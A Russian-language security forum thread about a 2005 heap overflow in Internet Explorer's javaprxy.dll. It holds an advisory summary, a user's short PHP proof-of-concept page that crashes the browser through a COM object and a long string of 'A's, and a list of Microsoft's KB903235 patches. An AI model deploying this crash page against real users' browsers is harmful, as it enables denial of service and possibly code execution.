Показано с 1 по 3 из 3.

Переполнение буфера в Microsoft Internet Explorer (javaprxy.dll)

  1. #1
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Shu_b
    Регистрация
    02.11.2004
    Сообщений
    3,553
    Вес репутации
    1664

    Переполнение буфера в Microsoft Internet Explorer (javaprxy.dll)

    Переполнение буфера в Microsoft Internet Explorer в библиотеке javaprxy.dll
    Программа: Microsoft Internet Explorer 6.0.2900.2180
    Опасность: Высокая
    Наличие эксплоита: Да
    Описание:

    Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

    Переполнение кучи существует в библиотеке javaprxy.dll при обработке исключений в COM объектах. Удаленный пользователь может с помощью специально сформированной HTML страницы вызвать аварийное завершение работы браузера или выполнить произвольный код на целевой системе.

    Пример/Эксполит: см. источник сообщения
    URL производителя: microsoft.com

    Решение: Способов устранения уязвимости не существует в настоящее время.

    Источники:
    http://www.securitylab.ru/55527.html ( http://www.securitylab.ru/55528.html )
    http://security.nnov.ru/Enews942.html

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Geser
    Guest
    Это прикол. Идё сюда http://www.securitylab.ru/55528.html и читаем:

    microsoft does not confirm the vulnerability, as their product team can
    not reproduce condition. however, they are looking at making changes to
    handle COM objects in a more robust manner in the future.

    Т.е. microsoft не подтвердила уязвимость, так как их программисты не могут воспроизвести условия.
    При этом используя приведённый там же код я отлично воспроизвёл условие без всяких проблем.

    Для тех кто не дружит с Перлом - код на PHP:
    PHP код:
    <?php

    $clsid 
    '03D9F3F2-B0E3-11D2-B081-006008039BF0'# javaprxy.dll

    $html1 "<html><body>\n<object
    classid=\"CLSID:"
    .$clsid."\"></object>\n";
    $html2 "\n</body><script>location.reload();</script></html>\n";

    print 
    "Content-Type: text/html;\r\n\r\n";

    print 
    $html1.str_repeat("A",30000).$html2;
      
    ?>
    Последний раз редактировалось Geser; 24.01.2007 в 23:06.

  4. #3
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Shu_b
    Регистрация
    02.11.2004
    Сообщений
    3,553
    Вес репутации
    1664

    An update available for a security vulnerability in the Javaprxy.dll COM object

    Обновление системы безопасности для обозревателя Internet Explorer устраняющее уязвимость в Javaprxy.dll COM

    Microsoft Knowledge Base Article 903235

    Security Update for Internet Explorer for Windows XP Service Pack 2 (KB903235)
    http://www.microsoft.com/downloads/i...splayLang%3den

    Security Update for Internet Explorer 5.5 Service Pack 2 (KB903235)
    http://www.microsoft.com/downloads/i...splayLang%3den

    Security Update for Internet Explorer 5.01 for Windows 2000 (KB903235)
    http://www.microsoft.com/downloads/i...splayLang%3den

    Security Update for Internet Explorer 6 Service Pack 1 (KB903235)
    http://www.microsoft.com/downloads/i...splayLang%3den

    Security Update for Internet Explorer for Windows Server 2003 (KB903235)
    http://www.microsoft.com/downloads/i...splayLang%3den

    Security Update for Internet Explorer for Windows Server 2003 x64-bit Edition (KB903235)
    http://www.microsoft.com/downloads/i...splayLang%3den

    Security Update for Internet Explorer for Windows Server 2003 Itanium 64-bit Edition (KB903235)
    http://www.microsoft.com/downloads/i...splayLang%3den
    Последний раз редактировалось Shu_b; 07.07.2005 в 18:30.

Похожие темы

  1. Ответов: 1
    Последнее сообщение: 23.03.2006, 08:29
  2. Ответов: 1
    Последнее сообщение: 18.07.2005, 09:44

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01267 seconds with 16 queries